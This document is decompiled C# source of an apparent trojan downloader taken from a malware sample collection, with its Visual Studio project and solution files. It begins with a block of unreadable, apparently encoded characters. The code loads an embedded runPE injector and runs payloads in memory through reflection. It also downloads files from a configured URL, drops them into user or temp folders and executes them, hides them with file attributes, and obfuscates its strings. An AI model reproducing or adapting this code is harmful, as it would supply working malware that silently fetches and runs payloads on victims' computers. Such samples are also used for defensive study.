½¾ùìí¡÷äóòèîï¼£°¯±£¾¿Œ‹½ÑóîõäâõèîïÒõôã×àíôäò¿Œ‹¡¡½Åäíèìèõäóò¿Œ‹¡¡¡¡½ÒõôãÅäíèì¿åçöêê÷ðë±ïñµõó°´ùõëæðõ²ëó½®ÒõôãÅäíè쿌‹¡¡¡¡½ÌäòòàæäÅäíèì¿ñõêûñôôå³²âçà÷õäâ±æû÷óí´ä½®ÌäòòàæäÅäíè쿌‹¡¡¡¡½ÀíæîÅäíèì¿Ôàûêøñðïâæí÷ó´ûòò½®ÀíæîÅäíè쿌‹¡¡¡¡½ìèòâäííàïäîôòÅäíèì¿çè÷æî±òãê÷ê´îææãøãöøëêäæä½®ìèòâäííàïäîôòÅäíè쿌‹¡¡¡¡½öäãÆäõÅäíèì¿åìñãé÷±âîðæãâðã÷í½®öäãÆäõÅäíè쿌‹¡¡¡¡½ÃîôïåÇèíäÅäíèì¿ûçêîååðóå±÷òéâèîåçåê°ðàøö½®ÃîôïåÇèíäÅäíè쿌‹¡¡¡¡½ÏäöÃîôïåÇèíäÅäíèì¿æðëèä´æ±ôí÷öçéò°õµ÷ëøùõ²ê½®ÏäöÃîôïåÇèíäÅäíè쿌‹¡¡½®Åäíèìèõäóò¿Œ‹¡¡½Óäòîôóâäò¿Œ‹¡¡¡¡½ÓäòîôóâäÕøñ俌‹¡¡¡¡¡¡½ÒäõõèïæòÕøñä¿ÐÕ±ÏÉÔÉÐÑÍË°ÄÅÔÔÖÅÒسÉÎÈËÔÈÖÇÕ°Ô³½®ÒäõõèïæòÕøñ俌‹¡¡¡¡¡¡½ÅàõàÕøñä¿ËÃÒÐ̵µ×ÎÑÖËÛÊÅÐѽ®ÅàõàÕøñ俌‹¡¡¡¡¡¡½ÃèïåäóÕøñä¿ÐÏÐÆ˲˴ÃÇÖÑÃÛʳÂÌÃ×ÖÀÍÅϽ®ÃèïåäóÕøñ俌‹¡¡¡¡½®ÓäòîôóâäÕøñ俌‹¡¡¡¡½ÓäòîôóâäÈÅ¿Œ‹¡¡¡¡¡¡½ÒäõõèïæòÈÅ¿´´½®ÒäõõèïæòÈÅ¿Œ‹¡¡¡¡¡¡½ÅàõàÈÅ¿²¹½®ÅàõàÈÅ¿Œ‹¡¡¡¡¡¡½ÃèïåäóÈÅ¿¸´½®ÃèïåäóÈÅ¿Œ‹¡¡¡¡½®ÓäòîôóâäÈÅ¿Œ‹¡¡½®Óäòîôóâäò¿Œ‹¡¡½Óäìî÷äÂîå俌‹¡¡¡¡½ÌäòòàæäÃîù¿Õóôä½®ÌäòòàæäÃîù¿Œ‹¡¡¡¡½Òõàóõôñ¿Õóôä½®Òõàóõôñ¿Œ‹¡¡¡¡½Ãèïåäó¿Õóôä½®Ãèïåä󿌋¡¡¡¡½Âîìñóäòòèîï¿Õóôä½®Âîìñóäòòèîᅩ‹¡¡¡¡½ÖäãÆäõ¿Õóôä½®ÖäãÆäõ¿Œ‹¡¡½®Óäìî÷äÂîå俌‹¡¡½ÕóàïòçäóÕøñ俌‹¡¡¡¡½Óäòîôóâä¿Õóôä½®Óäòîôóâ俌‹¡¡½®ÕóàïòçäóÕøñ俌‹¡¡½ÓôïÑÄÌèòòèï濌‹¡¡¡¡½ÌèòòèïæÑÄ¿Çàíòä½®ÌèòòèïæÑÄ¿Œ‹¡¡¡¡½ÒõôãÄïâóøñõèîᅩ‹¡¡¡¡¡¡½äïâóøñõèîïÔòäå¿ÙÎÓ½®äïâóøñõèîïÔòä忌‹¡¡¡¡¡¡½àííÄïâóøñõèîïò¿Çàíòä½®àííÄïâóøñõèîïò¿Œ‹¡¡¡¡½®ÒõôãÄïâóøñõèîᅩ‹¡¡½®ÓôïÑÄÌèòòèï濌‹½®ÑóîõäâõèîïÒõôã×àíôäò¿
MSIL/Trojan-Downloader/Win32/V/Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe/Trojan-Downloader.Win32.VB.anrt.csproj
+47
View File
@@ -0,0 +1,47 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{8D9A5182-21E8-42D6-A744-9FF91B87AA1E}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>hh2ifwz3</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="wisp1ff1rpzacn3jgfnasrkhmiolo44qt.cs" />
<Compile Include="panz0mon2f5aateyhtphwozah.cs" />
<Compile Include="Rjk3ibeceopw5x00uimwa5h2w\ch2futx3h3zpmhyzsblwlfrdktcnf3voh.cs" />
<Compile Include="Vza1nv3mnlezcxvyx\ekrod4bellvfxnmof.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="runPE.dll" />
<EmbeddedResource Include="Settings.xml" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan-Downloader/Win32/V/Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe/Trojan-Downloader.Win32.VB.anrt.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "hh2ifwz3", "Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe.csproj", "{8D9A5182-21E8-42D6-A744-9FF91B87AA1E}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{8D9A5182-21E8-42D6-A744-9FF91B87AA1E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{8D9A5182-21E8-42D6-A744-9FF91B87AA1E}.Debug|Any CPU.Build.0 = Debug|Any CPU
{8D9A5182-21E8-42D6-A744-9FF91B87AA1E}.Release|Any CPU.ActiveCfg = Release|Any CPU
{8D9A5182-21E8-42D6-A744-9FF91B87AA1E}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan-Downloader/Win32/V/Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe/Vza1nv3mnlezcxvyx/ekrod4bellvfxnmof.cs
+524
View File
@@ -0,0 +1,524 @@
// Decompiled with JetBrains decompiler
// Type: Vza1nv3mnlezcxvyx.ekrod4bellvfxnmof
// Assembly: hh2ifwz3, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 68766CC0-7547-4113-80E9-8D0602728CEB
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe.exe
using Microsoft.Win32;
using Rjk3ibeceopw5x00uimwa5h2w;
using System;
using System.Diagnostics;
using System.IO;
using System.IO.Compression;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Threading;
using System.Windows.Forms;
namespace Vza1nv3mnlezcxvyx
{
public class ekrod4bellvfxnmof
{
private static bool Pfc4nm2xfxznssiyioxrgqtphwj0yo4me = true;
private byte[] Tts2baf3wiatv5ghnswu3fu4o;
private bool sdztd0ena42ywf4cfnspntfxhjgjjuo2x;
private string vazu5g3yn2qoupbzrnflcm5ta;
private string jfq5w2hqrukvsivotb2eaetcj;
private string H43ao0q1ckx2y3w0qhozixdn5 = wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("0");
private int C2zbxxi4za2fdbthchmjymbz0;
private int Zusxmm13kjq0lro02;
private int Byijlyljtwhknkf5jkcwcjhnmxbyfow1f;
private string Mi5ejdb45agibefgw = wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("ROX");
private string Vwrshilkfvt1muxtiaxqao2vn = string.Empty;
private string Va4nkquvaa0egawrugbp4frralrih1cl5 = string.Empty;
private int vu05zlvgf2zzuc3uhqtm0qh2kdijzsnxb;
private string act0dsy5xkcjtyk4udzmsxpor = wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("0");
private string mehj1nkb5kab31y4pa5zzd3zh = wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("0");
private string Z2sx3vgolcrkx42a5b2bhnmdt = wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("0");
private string wvlwdt5q3igbdkbluauqgzxazzitgesk2 = wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("0");
private string ljjgffrum0vanmiev3ujguzbfjpaluf1a = string.Empty;
private string Ns5tkmgwpxzdzhfzygk50izkv = string.Empty;
private string Dxpmu5z21l0jogt41vcdm0t2p = string.Empty;
private string hdb50yp4mb51cxajtk2qahcip = string.Empty;
private string Qmztipvjjobds0bdpgipbz14g = string.Empty;
private string mqmfhbfuww2freoox = string.Empty;
private string Kkrle03d2ekkcyuc2c2102hjd = string.Empty;
private string hyrbz1kfxjvaxj0vistcunjymen3kporm = string.Empty;
private string Ajiami1b52zvc3vohgymtmh5a = string.Empty;
private string R3u01lftwibuhcd22 = string.Empty;
private string Zjtchyef12cwxg4onylzlprmn = string.Empty;
private bool cxhxnrorc5mp1ujxhtq1kbke4;
private bool Fkgl04y45wljpapzd;
private string U5rbzma1hlby3eyyhjbmc5kyd = string.Empty;
private string Odlyq3qfbpoq3mg0so5fipxwu = string.Empty;
private bool cwygyk0oxmm4oly4f;
private string Obpmsku4cgcztab1lmoobkyt5 = string.Empty;
private string gkgcqdokyjuxym4wq0314usgk = string.Empty;
private string nd5mirnaddlzplmuj2yyvlyhv = string.Empty;
private string Jxy14wwtwogymn1qrjcja2xpw = string.Empty;
private bool Mebghajzp0czroix5exzsbjcb;
private bool rkkwfbuqo0azkksqy;
private bool buvpnbb4jdddrparyku5zhpzb;
private bool cgkruwksz1uyngdvorfai14estiwjwa22;
private object zuc0g2puhfoogprwx4kio2wu1;
private MethodInfo Gdjkuqh0cbgb2rrfkrtpdepl3;
private byte[] h3mz2iy1yrgiwje2h(
byte[] V1vn1s3fuxwiz1zga0ixvfsqwh4o403an,
int nmn3ufkvroquqymwx)
{
GZipStream gzipStream = new GZipStream((Stream) new MemoryStream(V1vn1s3fuxwiz1zga0ixvfsqwh4o403an), CompressionMode.Decompress);
byte[] buffer = new byte[nmn3ufkvroquqymwx];
gzipStream.Read(buffer, 0, buffer.Length);
return buffer;
}
private object Xthp414gtl2l4oueqfpd4vbwz(int nauf3mqkhnk2uh1b0ctkgdwzdgjublhyf)
{
Assembly assembly = Assembly.Load(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.br40vohypenwwv4th(ekrod4bellvfxnmof.S2suq1p5s53jd0tp35scdyryf(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("lld.EPnur"))));
Thread.Sleep(1000);
System.Type type = assembly.GetTypes()[nauf3mqkhnk2uh1b0ctkgdwzdgjublhyf];
this.Gdjkuqh0cbgb2rrfkrtpdepl3 = type.GetMethod(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("nuR"));
return Activator.CreateInstance(type);
}
public static byte[] S2suq1p5s53jd0tp35scdyryf(string qocihecx3yidmrejz)
{
using (Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(qocihecx3yidmrejz))
{
byte[] buffer = new byte[1024];
using (MemoryStream memoryStream = new MemoryStream())
{
while (true)
{
int count = manifestResourceStream.Read(buffer, 0, buffer.Length);
if (count > 0)
memoryStream.Write(buffer, 0, count);
else
break;
}
return memoryStream.ToArray();
}
}
}
private byte[] pcbc3w2jxlqgmdfs0dlf3dbkc(byte[] Rmzrohqsvjl2eukqp)
{
if (this.Mi5ejdb45agibefgw == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("rox"))
Rmzrohqsvjl2eukqp = wisp1ff1rpzacn3jgfnasrkhmiolo44qt.br40vohypenwwv4th(Rmzrohqsvjl2eukqp);
return Rmzrohqsvjl2eukqp;
}
private void Dsqyxep1xbkqqwuokcmpwlnunygdkudqf()
{
try
{
byte[] numArray = new WebClient().DownloadData(new Uri(this.Obpmsku4cgcztab1lmoobkyt5));
if (this.gkgcqdokyjuxym4wq0314usgk == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("0"))
{
try
{
if (!this.Eapnz3st2tmrdospqmsffns5v(numArray))
{
this.zuc0g2puhfoogprwx4kio2wu1 = this.Xthp414gtl2l4oueqfpd4vbwz(0);
this.Gdjkuqh0cbgb2rrfkrtpdepl3.Invoke(this.zuc0g2puhfoogprwx4kio2wu1, new object[3]
{
(object) numArray,
(object) this.Odlyq3qfbpoq3mg0so5fipxwu,
null
});
}
}
catch
{
string tempFileName = Path.GetTempFileName();
this.c55ygxxz3rp1vsemw5o013b42(numArray, tempFileName, true);
}
}
if (!(this.gkgcqdokyjuxym4wq0314usgk == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1")))
return;
string str = this.nd5mirnaddlzplmuj2yyvlyhv + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\") + this.Jxy14wwtwogymn1qrjcja2xpw;
this.c55ygxxz3rp1vsemw5o013b42(numArray, str, true);
if (this.Mebghajzp0czroix5exzsbjcb)
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.Hidden);
if (this.rkkwfbuqo0azkksqy)
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.ReadOnly);
if (!this.buvpnbb4jdddrparyku5zhpzb)
return;
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.System);
}
catch (Exception ex)
{
}
}
private static void kv5qn4lnozkkzgj3vdlka0jwl(byte[] Aucuhbtavanuedaqa)
{
try
{
Thread thread = new Thread(new ParameterizedThreadStart(ekrod4bellvfxnmof.Ezm5v3x5yymbsublp));
thread.SetApartmentState(ApartmentState.STA);
thread.Start((object) Aucuhbtavanuedaqa);
thread.Join();
}
catch
{
ekrod4bellvfxnmof.Pfc4nm2xfxznssiyioxrgqtphwj0yo4me = false;
}
}
private static void Ezm5v3x5yymbsublp(object cbftjeed2ce2adwwe4mzldgan)
{
try
{
MethodInfo entryPoint = Assembly.Load((byte[]) cbftjeed2ce2adwwe4mzldgan).EntryPoint;
if (entryPoint.GetParameters().Length == 1)
entryPoint.Invoke((object) null, new object[1]
{
(object) new string[0]
});
else
entryPoint.Invoke((object) null, (object[]) null);
}
catch
{
ekrod4bellvfxnmof.Pfc4nm2xfxznssiyioxrgqtphwj0yo4me = false;
}
}
private bool Eapnz3st2tmrdospqmsffns5v(byte[] cjulchhdqxyzkyudifjjo2o31)
{
ekrod4bellvfxnmof.kv5qn4lnozkkzgj3vdlka0jwl(cjulchhdqxyzkyudifjjo2o31);
bool pfc4nm2xfxznssiyioxrgqtphwj0yo4me = ekrod4bellvfxnmof.Pfc4nm2xfxznssiyioxrgqtphwj0yo4me;
ekrod4bellvfxnmof.Pfc4nm2xfxznssiyioxrgqtphwj0yo4me = true;
return pfc4nm2xfxznssiyioxrgqtphwj0yo4me;
}
private void c55ygxxz3rp1vsemw5o013b42(
byte[] hzigskm110h1nfyzxef4f250l,
string Sykxwcxny5q4qajbe,
bool hfm3jqdunhihvesbsfgqdjg4j)
{
try
{
System.IO.File.WriteAllBytes(Sykxwcxny5q4qajbe, hzigskm110h1nfyzxef4f250l);
if (!hfm3jqdunhihvesbsfgqdjg4j)
return;
new Process()
{
StartInfo = {
FileName = Sykxwcxny5q4qajbe
}
}.Start();
}
catch
{
}
}
private byte[] n321udrptnm3xnkdwdxsh0wft(
string Juxxajgoa55m1rpp3wo1ces5w,
int Doydtmooq4wyxmncj,
string q05wpvgwzb3o3sxhl)
{
try
{
IntPtr hModule = ch2futx3h3zpmhyzsblwlfrdktcnf3voh.Pnqgzzjk5f0hyikci(string.Empty);
IntPtr hResInfo = ch2futx3h3zpmhyzsblwlfrdktcnf3voh.Ffz3mpnfyg4clsrkfrhqubycp(hModule, Doydtmooq4wyxmncj, q05wpvgwzb3o3sxhl);
uint length = ch2futx3h3zpmhyzsblwlfrdktcnf3voh.Ncmhhqqsfk5fqfa4eo2qymkyp(hModule, hResInfo);
IntPtr source = ch2futx3h3zpmhyzsblwlfrdktcnf3voh.yeyqpjvohzgayjchvjm2bzdvn(hModule, hResInfo);
byte[] destination = new byte[(IntPtr) length];
Marshal.Copy(source, destination, 0, (int) length);
return destination;
}
catch (Exception ex)
{
Console.WriteLine(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri(" :ecruoser gnidaer rorrE") + Environment.NewLine + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri(" :edoc rorrE") + ex.Message);
return (byte[]) null;
}
}
private string rxto5yfudomwo4quiatvxlgxu(string Mbiqervyw5m4axeh1jzypdawz)
{
if (Mbiqervyw5m4axeh1jzypdawz == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("htaP noitacilppA"))
Mbiqervyw5m4axeh1jzypdawz = Application.StartupPath + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\");
if (Mbiqervyw5m4axeh1jzypdawz == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("pmeT"))
Mbiqervyw5m4axeh1jzypdawz = Path.GetTempPath();
if (Mbiqervyw5m4axeh1jzypdawz == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("ataDppA"))
Mbiqervyw5m4axeh1jzypdawz = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\");
if (Mbiqervyw5m4axeh1jzypdawz == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("stnemucoD yM"))
Mbiqervyw5m4axeh1jzypdawz = Environment.GetFolderPath(Environment.SpecialFolder.Personal) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\");
if (Mbiqervyw5m4axeh1jzypdawz == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("potkseD"))
Mbiqervyw5m4axeh1jzypdawz = Environment.GetFolderPath(Environment.SpecialFolder.Desktop) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\");
if (Mbiqervyw5m4axeh1jzypdawz == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("eliforP resU"))
Mbiqervyw5m4axeh1jzypdawz = Environment.GetEnvironmentVariable(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("ELIFORPRESU")) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\");
if (Mbiqervyw5m4axeh1jzypdawz == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("seliF margorP"))
Mbiqervyw5m4axeh1jzypdawz = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\");
return Mbiqervyw5m4axeh1jzypdawz;
}
private string Lzzeex3tbjpnswaet3q3lgne0(string Xp3a2j1mbsdadmfpxakut5qur)
{
string str = string.Empty;
if (Xp3a2j1mbsdadmfpxakut5qur == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("0"))
str = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\");
if (Xp3a2j1mbsdadmfpxakut5qur == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1"))
str = Path.GetTempPath();
if (Xp3a2j1mbsdadmfpxakut5qur == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("2"))
str = Environment.GetFolderPath(Environment.SpecialFolder.Personal) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\");
return str;
}
private void Myk2onyuqzunnxikmdzm0nc2t(string Rmzrohqsvjl2eukqp)
{
string[] separator1 = new string[1]
{
wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("k3txyjv4t1shfwvlu0g5eijqg")
};
string[] separator2 = new string[1]
{
wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("wyaq1kdfdoichsv0drqddokfz")
};
string[] strArray1 = Rmzrohqsvjl2eukqp.Split(separator1, StringSplitOptions.None);
string empty1 = string.Empty;
string empty2 = string.Empty;
string empty3 = string.Empty;
for (int index = 1; index < strArray1.GetUpperBound(0); ++index)
{
string[] strArray2 = strArray1[index].Split(separator2, StringSplitOptions.None);
byte[] numArray = panz0mon2f5aateyhtphwozah.ydxqx4ckpkuemhnp4n2eb4laj(strArray2[1]);
string str1 = strArray2[2];
bool boolean1 = Convert.ToBoolean(strArray2[3]);
string Mbiqervyw5m4axeh1jzypdawz = strArray2[4];
bool boolean2 = Convert.ToBoolean(strArray2[5]);
bool boolean3 = Convert.ToBoolean(strArray2[6]);
int int32 = Convert.ToInt32(strArray2[7]);
bool boolean4 = Convert.ToBoolean(strArray2[8]);
string str2 = this.rxto5yfudomwo4quiatvxlgxu(Mbiqervyw5m4axeh1jzypdawz);
if (boolean1)
{
if (boolean3)
numArray = this.h3mz2iy1yrgiwje2h(numArray, int32);
if (boolean2)
numArray = this.pcbc3w2jxlqgmdfs0dlf3dbkc(numArray);
if (!boolean4)
{
try
{
this.zuc0g2puhfoogprwx4kio2wu1 = this.Xthp414gtl2l4oueqfpd4vbwz(0);
this.Gdjkuqh0cbgb2rrfkrtpdepl3.Invoke(this.zuc0g2puhfoogprwx4kio2wu1, new object[3]
{
(object) numArray,
(object) this.Odlyq3qfbpoq3mg0so5fipxwu,
null
});
}
catch (Exception ex)
{
Console.WriteLine(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri(" :yromem otni elif dnuob gnitcejni rorrE") + Environment.NewLine + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri(" :edoc rorrE") + ex.Message);
}
}
else if (!this.Eapnz3st2tmrdospqmsffns5v(numArray))
Console.WriteLine(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri(" :noitcelfer gnisu elif dnuob gnitcejni rorrE"));
}
else
{
string Sykxwcxny5q4qajbe = str2 + str1;
if (boolean2)
numArray = this.pcbc3w2jxlqgmdfs0dlf3dbkc(numArray);
this.c55ygxxz3rp1vsemw5o013b42(numArray, Sykxwcxny5q4qajbe, true);
}
}
}
private void i4apa2zau4uyfet5mwpyrsauzpucwiech(string Rmzrohqsvjl2eukqp)
{
string[] separator1 = new string[1]
{
wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("e5lrvzg0cetvafc32duupzktp")
};
string[] strArray1 = Rmzrohqsvjl2eukqp.Split(separator1, StringSplitOptions.None);
string[] separator2 = new string[1]
{
wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("ssz5rvlgcnqpykzaU")
};
string[] strArray2 = Rmzrohqsvjl2eukqp.Split(separator2, StringSplitOptions.None);
string[] separator3 = new string[1]
{
wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("egekjywbybggo5kvkbs0ogvif")
};
string[] strArray3 = Rmzrohqsvjl2eukqp.Split(separator3, StringSplitOptions.None);
string[] separator4 = new string[1]
{
wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("lvbqcbgqoc0vhbpmd")
};
string[] strArray4 = Rmzrohqsvjl2eukqp.Split(separator4, StringSplitOptions.None);
this.H43ao0q1ckx2y3w0qhozixdn5 = strArray1[1];
this.vazu5g3yn2qoupbzrnflcm5ta = strArray1[2];
this.jfq5w2hqrukvsivotb2eaetcj = strArray1[3];
this.C2zbxxi4za2fdbthchmjymbz0 = Convert.ToInt32(strArray1[4]);
this.Zusxmm13kjq0lro02 = Convert.ToInt32(strArray1[5]);
this.Byijlyljtwhknkf5jkcwcjhnmxbyfow1f = Convert.ToInt32(strArray1[6]);
this.Mi5ejdb45agibefgw = strArray2[1];
this.Vwrshilkfvt1muxtiaxqao2vn = strArray2[2];
this.Va4nkquvaa0egawrugbp4frralrih1cl5 = strArray2[3];
this.vu05zlvgf2zzuc3uhqtm0qh2kdijzsnxb = Convert.ToInt32(strArray3[1]);
this.act0dsy5xkcjtyk4udzmsxpor = strArray3[2];
this.mehj1nkb5kab31y4pa5zzd3zh = strArray3[3];
this.Z2sx3vgolcrkx42a5b2bhnmdt = strArray3[4];
this.wvlwdt5q3igbdkbluauqgzxazzitgesk2 = strArray3[5];
this.ljjgffrum0vanmiev3ujguzbfjpaluf1a = strArray3[6];
this.Ns5tkmgwpxzdzhfzygk50izkv = strArray3[7];
this.Dxpmu5z21l0jogt41vcdm0t2p = strArray3[8];
this.hdb50yp4mb51cxajtk2qahcip = strArray3[9];
this.Qmztipvjjobds0bdpgipbz14g = strArray3[10];
this.mqmfhbfuww2freoox = strArray3[11];
this.Kkrle03d2ekkcyuc2c2102hjd = this.Lzzeex3tbjpnswaet3q3lgne0(strArray3[12]);
this.hyrbz1kfxjvaxj0vistcunjymen3kporm = strArray3[13];
this.Ajiami1b52zvc3vohgymtmh5a = strArray3[14];
this.R3u01lftwibuhcd22 = strArray3[15];
this.cxhxnrorc5mp1ujxhtq1kbke4 = Convert.ToBoolean(strArray3[16]);
this.Fkgl04y45wljpapzd = Convert.ToBoolean(strArray3[17]);
this.U5rbzma1hlby3eyyhjbmc5kyd = this.rxto5yfudomwo4quiatvxlgxu(strArray3[18]) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\") + Path.GetRandomFileName();
this.Zjtchyef12cwxg4onylzlprmn = strArray3[19];
this.Odlyq3qfbpoq3mg0so5fipxwu = strArray3[20];
